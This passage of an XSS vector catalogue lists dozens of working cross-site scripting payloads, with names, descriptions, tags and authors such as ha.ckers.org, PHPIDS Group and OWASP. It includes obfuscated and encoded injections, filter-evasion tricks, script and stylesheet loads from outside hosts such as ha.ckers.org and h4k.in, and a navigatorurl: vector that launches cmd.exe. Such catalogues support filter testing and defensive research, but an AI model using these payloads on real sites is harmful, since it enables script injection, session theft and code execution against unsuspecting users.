+Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +JavaScript Link Location +Exploit Name: JavaScript Link Location +Exploit String: <A HREF="javascript:document.location='http://www.google.com/'">XSS</A> +Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed) +JavaScript link location +Exploit Tags: general, evil tags, obfuscated, redirect +Author Name: ha.ckers.org + +JavaScript-breaker using carriage return +Exploit Name: JavaScript-breaker using carriage return +Exploit String: %0da=eval;b=alert;a(b(/d/.source)); +Exploit Description: This vector uses an urlencoded carriage return to break JS code and produce an alert afterwards. +Exploit Tags: general, JS breaking, CRLF +Author Name: kishor + +JS link with whitespace obfuscation +Exploit Name: JS link with whitespace obfuscation +Exploit String: <a href = "javas cript :ale rt(1)">test +Exploit Description: This vector utilizes whitespace to obfuscate and contains a JS link. +Exploit Tags: general, evil tags, obfuscated +Author Name: thespanner.co.uk + +JS string concatenation breaker +Exploit Name: JS string concatenation breaker +Exploit String: +alert(0)+ +Exploit Description: This can be used when input is concatenated in JavaScript. +Exploit Tags: general, JS breaking, basic +Author Name: .mario + +JSON based obfuscated onload vector +Exploit Name: JSON based obfuscated onload vector +Exploit String: <body onload=;a2={y:eval};a1={x:a2.y('al'+'ert')};;;;;;;;;_=a1.x;_(1);;;; +Exploit Description: This vector injects a new body tag and utilized the onload event to modify the DOM. JSON parenthesis and semicolons are to evade filters. 
+Exploit Tags: general, evil tags, JSON, obfuscated +Author Name: thespanner.co.uk + +JSON based onload vector +Exploit Name: JSON based onload vector +Exploit String: <body onload=a1={x:this.parent.document};a1.x.writeln(1);> +Exploit Description: This vector injects a new body tag and utilized the onload event to modify the DOM +Exploit Tags: general, evil tags, JSON, obfuscated +Author Name: thespanner.co.uk + +JSON based semicolon-onload vector +Exploit Name: JSON based semicolon-onload vector +Exploit String: <body onload=;a1={x:document};;;;;;;;;_=a1.x;_.write(1);;;; +Exploit Description: This vector injects a new body tag and utilized the onload event to modify the DOM. Also this vector uses semicolons to obfuscate. +Exploit Tags: general, evil tags, JSON, obfuscated +Author Name: thespanner.co.uk + +LAYER +Exploit Name: LAYER +Exploit String: <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> +Exploit Description: Layer (Older Netscape only) +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +List-style-image +Exploit Name: List-style-image +Exploit String: <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS +Exploit Description: Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector. +Exploit Tags: general, evil tags, internet explorer +Author Name: ha.ckers.org + +Livescript +Exploit Name: Livescript +Exploit String: <IMG SRC="livescript:[code]"> +Exploit Description: Livescript (Older Netscape only) +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +Local .htc file +Exploit Name: Local .htc file +Exploit String: <XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"> +Exploit Description: This uses an .htc file which must be on the same server as the XSS vector. 
The example file works by pulling in the JavaScript and running it as part of the style attribute. +Exploit Tags: general, evil tags, internet explorer, injection +Author Name: ha.ckers.org + +Long UTF-8 Unicode w/out Semicolons +Exploit Name: Long UTF-8 Unicode w/out Semicolons +Exploit String: <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +Exploit Description: Long UTF-8 Unicode encoding without semicolons (this is often effective in XSS that attempts to look for ”&#XX;”, since most people don't know about padding - up to 7 numeric characters total). This is also useful against people who decode against strings like $tmp_string =~ s/.*\&#(\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate an html encoded string (I've seen this in the wild). +Exploit Tags: general, evil tags, obfuscated, internet explorer +Author Name: ha.ckers.org + +Malformed IMG Tags +Exploit Name: Malformed IMG Tags +Exploit String: <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +Exploit Description: Originally found by Begeek (http://www.begeek.it/2006/03/18/esclusivo-vulnerabilita-xss-in-firefox/#more-300 - cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Markup breaker with special quotes +Exploit Name: Markup breaker with special quotes +Exploit String: %26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);// +Exploit Description: This markup breaking vector utilizes specially crafted quotes to break the existing markup. 
+Exploit Tags: general, html breaking, JS breaking +Author Name: kishor + +META +Exploit Name: META +Exploit String: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +Exploit Description: The odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs. +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +META w/additional URL parameter +Exploit Name: META w/additional URL parameter +Exploit String: <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> +Exploit Description: Meta with additional URL parameter. If the target website attempts to see if the URL contains an ”http://” you can evade it with the following technique (Submitted by Moritz Naumann http://www.moritz-naumann.com) +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +META w/data:URL +Exploit Name: META w/data:URL +Exploit String: <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64###PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +Exploit Description: This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, since it utilizes base64 encoding. Please see http://www.ietf.org/rfc/rfc2397.txt for more details +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +Mixed Encoding +Exploit Name: Mixed Encoding +Exploit String: <A HREF="http://6&#09;6.000146.0x7.147/">XSS</A> +Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed). +The tabs and newlines only work if this is encapsulated with quotes. 
+Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Mocha +Exploit Name: Mocha +Exploit String: <IMG SRC="mocha:[code]"> +Exploit Description: Mocha (Older Netscape only) +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +Mozilla -moz-binding-url injection +Exploit Name: Mozilla -moz-binding-url injection +Exploit String: style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a=" +Exploit Description: The vector incudes a binding file via injected style attrbute. Gecko only. +Exploit Tags: general, injection, gecko, style injection, XBL +Author Name: .mario + +Mozilla -moz-binding-url injection - filter evading +Exploit Name: Mozilla -moz-binding-url injection - filter evading +Exploit String: sstyle=foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a=" +Exploit Description: This vector was once used on a major site to evade a stripping filter and inject binding XML. +Exploit Tags: general, injection, gecko, style injection, XBL +Author Name: PHPIDS Group + +Multiline selfcontained XSS +Exploit Name: Multiline selfcontained XSS +Exploit String: _ += +eval +b=1 +__ += +location +c=1 +_ +( +__ +. +hash +// +. +substr +(1) +) +Exploit Description: This vector uses line breaks to obfuscate and evaluates the location hash. +Exploit Tags: self contained, general, obfuscated +Author Name: .mario + +Multiline w/Carriage Returns +Exploit Name: Multiline w/Carriage Returns +Exploit String: <IMGSRC="javascript:alert('XSS')"> +Exploit Description: Multiline Injected JavaScript using ASCII carriage returns (same as above only a more extreme example of this XSS vector). +Exploit Tags: general, evil tags, internet explorer +Author Name: ha.ckers.org + +Name contained XSS variant 1 +Exploit Name: Name contained XSS variant 1 +Exploit String: b=top,a=/loc/ . source,a+=/ation/ . 
source,b[a=a] = name +Exploit Description: This vector depends on attackers ability to access the window.name property where the payload is located. +Exploit Tags: general, name contained, obfuscated +Author Name: PHPIDS Group + +Name contained XSS variant 2 +Exploit Name: Name contained XSS variant 2 +Exploit String: a=/ev/// + +.source a+=/al/// + +.source a[a] (name) +Exploit Description: This name contained XSS requires newlines to be able to work - and access to the window.name property. +Exploit Tags: general, name contained, obfuscated +Author Name: .mario + +Name contained XSS variant 3 +Exploit Name: Name contained XSS variant 3 +Exploit String: a=/ev/ + +.source a+=/al/ + +.source,a = a[a] a(name) +Exploit Description: New-lined requiring name contained vector - this time not comment obfuscated so easier to detect. +Exploit Tags: general, name contained +Author Name: PHPIDS Group + +Name contained XSS variant 4 +Exploit Name: Name contained XSS variant 4 +Exploit String: setTimeout// +(name// ,0) +Exploit Description: This vector utilizes the setTimeout function to fire - also it's name contained and comment-obfuscated and requires newlines. +Exploit Tags: general, name contained, obfuscated, timed +Author Name: PHPIDS Group + +navigatorurl: code execution +Exploit Name: navigatorurl: code execution +Exploit String: navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process) +Exploit Description: This navigatorurl-uri executes the cmd.exe on vulnerable systems. 
+Exploit Tags: URI exploits, gecko, injection, general +Author Name: xs-sniper + +No Closing Script Tag +Exploit Name: No Closing Script Tag +Exploit String: <SCRIPT SRC=http://ha.ckers.org/xss.js +Exploit Description: In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don't actually need the ”></SCRIPT>” portion of this Cross Site Scripting vector. Firefox assumes it's safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn't affect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they're not needed generally. +Exploit Tags: general, evil tags, injection, gecko +Author Name: ha.ckers.org + +No Quotes/Semicolons +Exploit Name: No Quotes/Semicolons +Exploit String: <SCRIPT>a=/XSS/alert(a.source)</SCRIPT> +Exploit Description: No single quotes or double quotes or semicolons. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Non-Alpha/Non-Digit +Exploit Name: Non-Alpha/Non-Digit +Exploit String: <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +Exploit Description: Non-alpha-non-digit XSS. While I was reading the Firefox HTML parser I found that it assumes a non-alpha-non-digit is not valid after an HTML keyword and therefore considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example ”<SCRIPT\s” != ”<SCRIPT/XSS\s” +Exploit Tags: general, evil tags, injection +Author Name: ha.ckers.org + +Non-Alpha/Non-Digit Part 2 +Exploit Name: Non-Alpha/Non-Digit Part 2 +Exploit String: <BODY onload!#$%&()*~+-_.###:;?@[/|\]^`=alert("XSS")> +Exploit Description: Non-alpha-non-digit XSS part 2. yawnmoth brought my attention to this vector, based on the same idea as above, however, I expanded on it, using my fuzzer. 
The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc...) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this does not apply to the grave accent char as seen here. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Noscript-breaker with mouseover +Exploit Name: Noscript-breaker with mouseover +Exploit String: </noscript><br><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code> +Exploit Description: This vector breaks noscript areas and appends an element reacting on mouseover events. +Exploit Tags: general, html breaking, obfuscated, user interaction +Author Name: kishor + +Null Chars 1 +Exploit Name: Null Chars 1 +Exploit String: perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out +Exploit Description: Okay, I lied, null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy (http://www.portswigger.net/proxy/) or use %00 in the URL string or if you want to write your own injection tool you can use Vim (^V^@ will produce a null) to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example. +Exploit Tags: general, evil tags, obfuscated, internet explorer, CRLF +Author Name: ha.ckers.org + +Null Chars 2 +Exploit Name: Null Chars 2 +Exploit String: perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out +Exploit Description: Here is a little known XSS attack vector using null characters. You can actually break up the HTML itself using the same nulls as shown above. 
I've seen this vector bypass some of the most restrictive XSS filters to date +Exploit Tags: general, evil tags, obfuscated, CRLF +Author Name: ha.ckers.org + +Obfuscated body onload vector +Exploit Name: Obfuscated body onload vector +Exploit String: <body onload=;;;;;;;;;;;_=alert;_(1);;;; +Exploit Description: This vector creates a new body tag and utilizes semicolons and underscores to evade filters and produce an alert. +Exploit Tags: general, evil tags, obfuscated +Author Name: thespanner.co.uk + +Obfuscated DOM element creation +Exploit Name: Obfuscated DOM element creation +Exploit String: s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2= +0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7= +0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=pa +rentNode;x.appendChild(i); +Exploit Description: This vector utilizes ternary operators to obfuscate JavaScript code which creates new DOM elements. +Exploit Tags: general, obfuscated, injection +Author Name: thespanner.co.uk + +Obfuscated double-body onload vector +Exploit Name: Obfuscated double-body onload vector +Exploit String: <body <body onload=;;;;;al:eval('al'+'ert(1)');;> +Exploit Description: This vector creates a doubled new body tag and utilizes semicolons to evade filters and produce an alert. +Exploit Tags: general, evil tags, obfuscated +Author Name: thespanner.co.uk + +Obfuscated image tag using dec entities +Exploit Name: Obfuscated image tag using dec entities +Exploit String: <IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97; +&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41> +Exploit Description: This attack is built together with obfuscated decimal entities and create a JS image source. 
+Exploit Tags: general, basic, obfuscated, evil tags, internet explorer +Author Name: OWASP + +Obfuscated image tag using hex entities +Exploit Name: Obfuscated image tag using hex entities +Exploit String: <IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28 +&<WBR>#x27&#x58&#x53&#x53&#x27&#x29> +Exploit Description: This attack is built together with obfuscated hexadecimal entities and create a JS image source. +Exploit Tags: general, basic, obfuscated, evil tags, internet explorer +Author Name: OWASP + +Obfuscated image tag using long dec entities +Exploit Name: Obfuscated image tag using long dec entities +Exploit String: <IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058 +&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041> +Exploit Description: This attack is built together with obfuscated long decimal entities and create a JS image source. +Exploit Tags: general, owasp, obfuscated, evil tags, internet explorer +Author Name: OWASP + +Obfuscated JS image source +Exploit Name: Obfuscated JS image source +Exploit String: >"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a; +alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)> +Exploit Description: This vector uses urlencoded hex entities to obfuscate the javascript: image source. +Exploit Tags: general, owasp, obfuscated, evil tags, internet explorer +Author Name: OWASP + +Obfuscated name trigger for Firefox +Exploit Name: Obfuscated name trigger for Firefox +Exploit String: (1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0) +Exploit Description: This XSS vector uses a parser bug in Firefox to obfuscate the methods needed to trigger the name contained payload. 
+Exploit Tags: general, gecko, obfuscated, self contained +Author Name: SIrDarckCat + +Obfuscated onload attribute variant 1 +Exploit Name: Obfuscated onload attribute variant 1 +Exploit String: <body/s/onload=x={doc:parent.document};x.doc.writeln(1) +Exploit Description: This vector creates a new body tag including an obfuscated onload attribute. Also the document object is wrapped into a JSON literal to evade filters. +Exploit Tags: general, obfuscated, evil tags, JSON +Author Name: thespanner.co.uk + +Obfuscated onload attribute variant 2 +Exploit Name: Obfuscated onload attribute variant 2 +Exploit String: <body/””$/onload=x={doc:parent[’document’]};x.doc.writeln(1) +Exploit Description: This vector creates a new body tag including an obfuscated onload attribute. Also the document object is wrapped into a JSON literal to evade filters. +Exploit Tags: general, obfuscated, evil tags, JSON +Author Name: thespanner.co.uk + +Obfuscated XML predicate vector variation 1 +Exploit Name: Obfuscated XML predicate vector variation 1 +Exploit String: 123[''+<_>ev</_>+<_>al</_>](''+<_>aler</_>+<_>t</_>+<_>(1)</_>); +Exploit Description: This vector uses XML predicates to obfuscate its payload and the fact that you can use underscores as XML tags. +Exploit Tags: general, xml predicates, obfuscated, gecko +Author Name: PHPIDS Group + +Obfuscated XML predicate vector variation 2 +Exploit Name: Obfuscated XML predicate vector variation 2 +Exploit String: s1=<s>evalalerta(1)a</s>,s2=<s></s>+'',s3=s1+s2,e1=/s/!=/s/?s3[0]: +0,e2=/s/!=/s/?s3[1]:0,e3=/s/!=/s/?s3[2]:0,e4=/s/!=/s/?s3[3]:0,e=/s/!=/ +s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/ +s/?s3[6]:0,a4=/s/!=/s/?s3[7]:0,a5=/s/!=/s/?s3[8]:0,a6=/s/!=/s/?s3[10]: +0,a7=/s/!=/s/?s3[11]:0,a8=/s/!=/s/?s3[12]: +0,a=a1+a2+a3+a4+a5+a6+a7+a8,1,e(a) +Exploit Description: This vector uses XML predicates to obfuscate its payload and the fact that you can use underscores as XML tags. 
Also a concatenation via ternary operator is being used. +Exploit Tags: general, xml predicates, obfuscated, gecko +Author Name: PHPIDS Group + +Obfuscated XML predicate vector variation 3 +Exploit Name: Obfuscated XML predicate vector variation 3 +Exploit String: o={x:''+<s>eva</s>+<s>l</s>,y:''+<s>aler</s>+<s>t</s>+<s>(1)</ +s>};function f() { 0[this.x](this.y) }f.call(o); +Exploit Description: This vector uses XML predicates to obfuscate its payload. The payload is furthermore wrapped into JSON literals for more obfuscation. +Exploit Tags: general, xml predicates, obfuscated, gecko, JSON +Author Name: .mario + +Obfuscated XSS variant 1 +Exploit Name: Obfuscated XSS variant 1 +Exploit String: ___=1?'ert(123)':0,_=1?'al':0,__=1?'ev':0,1[__+_](_+___) +Exploit Description: Shuffled and obfuscated function calls +Exploit Tags: general, obfuscated +Author Name: PHPIDS Group + +OBJECT +Exploit Name: OBJECT +Exploit String: <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> +Exploit Description: If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag. The linked file is actually an HTML file that can contain your XSS +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +OBJECT w/Embedded XSS +Exploit Name: OBJECT w/Embedded XSS +Exploit String: <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> +Exploit Description: Using an OBJECT tag you can embed XSS directly (this is unverified). +Exploit Tags: general, evil tags, obfuscated, internet explorer +Author Name: ha.ckers.org + +OBJECT w/Flash 2 +Exploit Name: OBJECT w/Flash 2 +Exploit String: a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";eval(a+b+c+d); +Exploit Description: Using this action script inside flash can obfuscate your XSS vector. 
+Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Octal Encoding +Exploit Name: Octal Encoding +Exploit String: <A HREF="http://0102.0146.0007.00000223/">XSS</A> +Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed). +Padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc... +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Open string contained in name property +Exploit Name: Open string contained in name property +Exploit String: open(name) +Exploit Description: This very simple but effective vector uses the open method on the name property. +Exploit Tags: general, super short, self contained +Author Name: SIrDarckCat + +PHP +Exploit Name: PHP +Exploit String: <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> +Exploit Description: PHP - requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Plain JavaScript alert +Exploit Name: Plain JavaScript alert +Exploit String: alert(1) +Exploit Description: This very basic exploit works on surprisingly many pages - no real danger but bad image. +Exploit Tags: general, basic, super short +Author Name: .mario + +Protocol Resolution Bypass +Exploit Name: Protocol Resolution Bypass +Exploit String: <A HREF="//www.google.com/">XSS</A> +Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed). +Protocol resolution bypass (// translates to http:// which saves a few more bytes). This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like ”(ht|f)tp(s)?://” (thanks to Ozh (http://planetOzh.com/) for part of this one). You can also change the ”//” to ”\\”. 
You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Protocol resolution in script tags +Exploit Name: Protocol resolution in script tags +Exploit String: <SCRIPT SRC=//ha.ckers.org/.j> +Exploit Description: This particular variant was submitted by Lukasz Pilorz and was based partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The ”.j” is valid, regardless of the MIME type because the browser knows it in context of a SCRIPT tag. +Exploit Tags: general, evil tags, obfuscated, injection +Author Name: ha.ckers.org + +RegExp based, and native C filter vector. +Exploit Name: RegExp based, and native C filter vector. +Exploit String: 0%0d%0a%00<script src=//h4k.in> +Exploit Description: This will break any RegExp that includes "$" (end of string), and some filters that do the verification manually with a for waiting for a NULL byte. +Exploit Tags: general, injection, CRLF, obfuscated +Author Name: SIrDarckCat +Author URL: http://sirdarckcat.net/ + +Remote IE URL overloading +Exploit Name: Remote IE URL overloading +Exploit String: s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1) +'+''; +u1=s1+s2+s3;URL=u1 +Exploit Description: This vector assembles an alert which will be fired using the URL property. 
+Exploit Tags: general, obfuscated, internet explorer, URL breaking +Author Name: thespanner.co.uk + +Remote Stylesheet 1 +Exploit Name: Remote Stylesheet 1 +Exploit String: <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> +Exploit Description: Remote style sheet (using something as simple as a remote style sheet you can include your XSS as the style question redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page. +Exploit Tags: general, evil tags, obfuscated, injection +Author Name: ha.ckers.org + +Remote Stylesheet 2 +Exploit Name: Remote Stylesheet 2 +Exploit String: <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> +Exploit Description: Remote style sheet part 2 (this works the same as above, but uses a <STYLE> tag instead of a <LINK> tag). A slight variation on this vector was used to hack Google Desktop http://www.hacker.co.il/security/ie/css_import.html. As a side note you can remote the end STYLE tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equal sign or a slash in your cross site scripting attack, which has come up at least once in the real world. +Exploit Tags: general, evil tags, obfuscated, style injection +Author Name: ha.ckers.org + +Remote Stylesheet 3 +Exploit Name: Remote Stylesheet 3 +Exploit String: <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> +Exploit Description: Remote style sheet part 3. This only works in Opera but is fairly tricky. Setting a link header is not part of the HTTP1.1 spec. 
However, some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <http://ha.ckers.org/xss.css>; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox. +Exploit Tags: general, evil tags, injection +Author Name: ha.ckers.org + +Remote Stylesheet 4 +Exploit Name: Remote Stylesheet 4 +Exploit String: <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> +Exploit Description: Remote style sheet part 4. This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefore is vulnerable to this for the vast majority of sites. +Exploit Tags: general, evil tags, obfuscated, style injection, XBL +Author Name: ha.ckers.org + +Removing Cnames +Exploit Name: Removing Cnames +Exploit String: <A HREF="http://google.com/">XSS</A> +Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed). +When combined with the above URL, removing ”www.” will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly. +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +Rename .js to .jpg +Exploit Name: Rename .js to .jpg +Exploit String: <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> +Exploit Description: Assuming you can only fit in a few characters and it filters against ”.js” you can rename your JavaScript file to an image as an XSS vector. 
+Exploit Tags: general, evil tags, obfuscated, injection +Author Name: ha.ckers.org + +res:// installed software probing +Exploit Name: res:// installed software probing +Exploit String: res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210 +Exploit Description: This res-uri can be used to probe for certain software in IE. +Exploit Tags: URI exploits, injection, general, obfuscated, internet explorer +Author Name: xs-sniper + +SCRIPT w/Alert() +Exploit Name: SCRIPT w/Alert() +Exploit String: <SCRIPT>alert('XSS')</SCRIPT> +Exploit Description: Basic injection attack +Exploit Tags: general, evil tags, basic +Author Name: ha.ckers.org + +SCRIPT w/Char Code +Exploit Name: SCRIPT w/Char Code +Exploit String: <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +Exploit Description: Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word ”XSS” will pop up. +Exploit Tags: general, evil tags, obfuscated, basic +Author Name: ha.ckers.org + +SCRIPT w/Source File +Exploit Name: SCRIPT w/Source File +Exploit String: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +Exploit Description: No filter evasion. This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here). 
+Exploit Tags: general, evil tags, basic, injection +Author Name: ha.ckers.org + +Self-contained XSS variant 1 +Exploit Name: Self-contained XSS variant 1 +Exploit String: a=0||'ev'+'al',b=0||location.hash,c=0||'sub'+'str',1[a](b[c](1)) +Exploit Description: Concatenates obfuscated eval() and substr() to be called on location.hash +Exploit Tags: general, self contained +Author Name: PHPIDS Group + +Self-contained XSS variant 2 +Exploit Name: Self-contained XSS variant 2 +Exploit String: a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n.h'+'ash.sub'||0;b+=0||'str(1)';c=b[a];c(c(b)) +Exploit Description: Concatenates fragmented functions to evakuate the location hash +Exploit Tags: general, self contained +Author Name: PHPIDS Group + +Self-contained XSS variant 3 +Exploit Name: Self-contained XSS variant 3 +Exploit String: eval.call(this,unescape.call(this,location)) +Exploit Description: Uses call() and eval() to access the payload in the fragment identifier +Exploit Tags: general, self contained +Author Name: PHPIDS Group + +Self-contained XSS variant 4 +Exploit Name: Self-contained XSS variant 4 +Exploit String: d=0||'une'+'scape'||0;a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n'||0;c=b[a];d=c(d);c(d(c(b))) +Exploit Description: This one is pretty hard to detect due to the total fragmentation. Fragments are built together to a self-executing function. +Exploit Tags: general, self contained +Author Name: PHPIDS Group + +Self-contained XSS variant 5 +Exploit Name: Self-contained XSS variant 5 +Exploit String: l= 0 || 'str',m= 0 || 'sub',x= 0 || 'al',y= 0 || 'ev',g= 0 || 'tion.h',f= 0 || 'ash',k= 0 || 'loca',d= (k) + (g) + (f),a +Exploit Description: This variant has the function fragments shuffled to evade concatenation filters and is thus very hard to detect. 
+Exploit Tags: general, self contained, shuffled +Author Name: PHPIDS Group + +Self-contained XSS variant 6 +Exploit Name: Self-contained XSS variant 6 +Exploit String: _=eval,__=unescape,___=document.URL,_(__(___)) +Exploit Description: Since Javascript allows \w+ as variable name - this vector uses _ to evade filters. +Exploit Tags: general, self contained +Author Name: PHPIDS Group + +Self-contained XSS variant 7 +Exploit Name: Self-contained XSS variant 7 +Exploit String: $_=document,$__=$_.URL,$___=unescape,$_=$_.body,$_.innerHTML = $___(http=$__) +Exploit Description: Uses special characters as variable names and self-executes the concatenated payload trigger. +Exploit Tags: general, self contained +Author Name: PHPIDS Group + +Self-contained XSS variant 8 +Exploit Name: Self-contained XSS variant 8 +Exploit String: $=document,$=$.URL,$$=unescape,$$$=eval,$$$($$($)) +Exploit Description: This time $ is used to obfuscate the self-executing payload trigger. +Exploit Tags: general, self contained +Author Name: PHPIDS Group + +Self-contained XSS variant 9 +Exploit Name: Self-contained XSS variant 9 +Exploit String: 